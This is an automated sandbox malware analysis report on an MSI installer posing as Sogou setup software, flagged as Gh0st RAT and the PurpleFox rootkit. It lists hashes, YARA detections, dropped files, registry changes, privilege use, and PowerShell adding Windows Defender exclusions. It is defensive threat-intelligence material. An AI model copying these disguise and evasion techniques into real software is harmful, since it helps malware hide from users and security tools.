gh0strat | 4315a6afe728ff28580a4c7ef798c47ccd7a438bbf58e97aaffce26b837c7384

Analysis

max time kernel
150s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
18-11-2024 04:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sougou_setup.msi
Size

157.6MB
MD5

5f3ca4cafda845296871c4e81fba5816
SHA1

a0d2af0c912dc0205a1fcd853444f2fa1f643968
SHA256

4315a6afe728ff28580a4c7ef798c47ccd7a438bbf58e97aaffce26b837c7384
SHA512

e103c3abf292ca634a5713e1abe913b3d8c25cb95321dcbb80e8737b593edb46f56b4b62620a03f0d5e00d73d7f7e793fec983cd20430d9c69b38015667de625
SSDEEP

3145728:SM/Vo6HfuRAXjkxF9zS21RHzmbIadvPVkq8HlZ3R78/x865/PxzHMfSVCv4w:doeIATsFo0RHYFdvNkXlZ3R7gx861pz6

Score

10^/10

gh0strat purplefox discovery execution persistence privilege_escalation rat rootkit trojan upx

Malware Config

Signatures

Detect PurpleFox Rootkit 4 IoCs

Detect PurpleFox Rootkit.

rootkit

resource	yara_rule
behavioral2/memory/4852-240-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	purplefox_rootkit
behavioral2/memory/4852-242-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	purplefox_rootkit
behavioral2/memory/4852-243-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	purplefox_rootkit
behavioral2/memory/4852-244-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	purplefox_rootkit

Gh0st RAT payload 4 IoCs

resource	yara_rule
behavioral2/memory/4852-240-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	family_gh0strat
behavioral2/memory/4852-242-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	family_gh0strat
behavioral2/memory/4852-243-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	family_gh0strat
behavioral2/memory/4852-244-0x000000002BCE0000-0x000000002BE9D000-memory.dmp	family_gh0strat

Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
Gh0strat family
gh0strat
PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox
Purplefox family
purplefox

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4388	powershell.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\K:	yrjwPObnoqyg.exe
File opened (read-only)	\??\S:	yrjwPObnoqyg.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	yrjwPObnoqyg.exe
File opened (read-only)	\??\M:	yrjwPObnoqyg.exe
File opened (read-only)	\??\V:	yrjwPObnoqyg.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	yrjwPObnoqyg.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\W:	yrjwPObnoqyg.exe
File opened (read-only)	\??\Y:	yrjwPObnoqyg.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\X:	yrjwPObnoqyg.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Q:	yrjwPObnoqyg.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\L:	yrjwPObnoqyg.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\O:	yrjwPObnoqyg.exe
File opened (read-only)	\??\R:	yrjwPObnoqyg.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	yrjwPObnoqyg.exe
File opened (read-only)	\??\N:	yrjwPObnoqyg.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	yrjwPObnoqyg.exe
File opened (read-only)	\??\T:	yrjwPObnoqyg.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	yrjwPObnoqyg.exe
File opened (read-only)	\??\U:	yrjwPObnoqyg.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	yrjwPObnoqyg.exe
File opened (read-only)	\??\J:	yrjwPObnoqyg.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PpMCUaskmPAB.exe.log	PpMCUaskmPAB.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5024-54-0x0000000000400000-0x00000000006DD000-memory.dmp	upx
behavioral2/memory/5024-219-0x0000000000400000-0x00000000006DD000-memory.dmp	upx

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File created	C:\Program Files\DriveHumbleTechnician\sougou.exe	msiexec.exe
File created	C:\Program Files\DriveHumbleTechnician\YJgbLqUbskWexDENSZyOncyGkufCAI	msiexec.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File created	C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log	PpMCUaskmPAB.exe
File created	C:\Program Files\DriveHumbleTechnician\fCwpAyMuVRIFHFczCVKWCOKCaXKCyQ	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\fCwpAyMuVRIFHFczCVKWCOKCaXKCyQ	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File created	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File created	C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe	MsiExec.exe
File created	C:\Program Files\DriveHumbleTechnician\valibclang2d.dll	msiexec.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe	MsiExec.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician	yrjwPObnoqyg.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log	PpMCUaskmPAB.exe
File created	C:\Program Files\DriveHumbleTechnician\eaHeznmosyoOWAGglCKDwYQViYXayS.exe	msiexec.exe
File created	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File created	C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
File created	C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs	yrjwPObnoqyg.exe
File opened for modification	C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.wrapper.log	PpMCUaskmPAB.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e583803.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e583803.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{8F3A952C-182E-4216-9CD1-86B4CA9964D1}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3D91.tmp	msiexec.exe
File created	C:\Windows\Installer\e583805.msi	msiexec.exe

Executes dropped EXE 9 IoCs

pid	Process
1068	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
4108	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
3764	yrjwPObnoqyg.exe
5024	sougou.exe
2564	PpMCUaskmPAB.exe
524	PpMCUaskmPAB.exe
1672	PpMCUaskmPAB.exe
3244	yrjwPObnoqyg.exe
4852	yrjwPObnoqyg.exe

Loads dropped DLL 10 IoCs

pid	Process
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe
5024	sougou.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs

persistence privilege_escalation

Installer Packages

T1546.016

Msiexec

T1218.007

pid	Process
1796	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yrjwPObnoqyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yrjwPObnoqyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eaHeznmosyoOWAGglCKDwYQViYXayS.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yrjwPObnoqyg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sougou.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1132	cmd.exe
3748	PING.EXE

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000038a6760542cf76680000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000038a676050000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090038a67605000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d38a67605000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000038a6760500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	yrjwPObnoqyg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	yrjwPObnoqyg.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	sougou.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	sougou.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	sougou.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WScript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	sougou.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	WScript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E	sougou.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	sougou.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\85CFF785A28B007498F9AABC4CA11EB4\C259A3F8E2816124C91D684BAC99461D	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\Version = "117571589"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\AdvertiseFlags = "388"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\Media	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\Clients = 3a0000000000	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\InstanceType = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\PackageName = "sougou_setup.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\ProductName = "DriveHumbleTechnician"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\PackageCode = "F8186EA320B6B324B8DC596BDF338BDD"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\85CFF785A28B007498F9AABC4CA11EB4	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C259A3F8E2816124C91D684BAC99461D	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C259A3F8E2816124C91D684BAC99461D\ProductFeature	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C259A3F8E2816124C91D684BAC99461D\Language = "1033"	msiexec.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3748	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
448	msiexec.exe
448	msiexec.exe
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe
3764	yrjwPObnoqyg.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1796	msiexec.exe
Token: SeSecurityPrivilege	448	msiexec.exe
Token: SeCreateTokenPrivilege	1796	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1796	msiexec.exe
Token: SeLockMemoryPrivilege	1796	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1796	msiexec.exe
Token: SeMachineAccountPrivilege	1796	msiexec.exe
Token: SeTcbPrivilege	1796	msiexec.exe
Token: SeSecurityPrivilege	1796	msiexec.exe
Token: SeTakeOwnershipPrivilege	1796	msiexec.exe
Token: SeLoadDriverPrivilege	1796	msiexec.exe
Token: SeSystemProfilePrivilege	1796	msiexec.exe
Token: SeSystemtimePrivilege	1796	msiexec.exe
Token: SeProfSingleProcessPrivilege	1796	msiexec.exe
Token: SeIncBasePriorityPrivilege	1796	msiexec.exe
Token: SeCreatePagefilePrivilege	1796	msiexec.exe
Token: SeCreatePermanentPrivilege	1796	msiexec.exe
Token: SeBackupPrivilege	1796	msiexec.exe
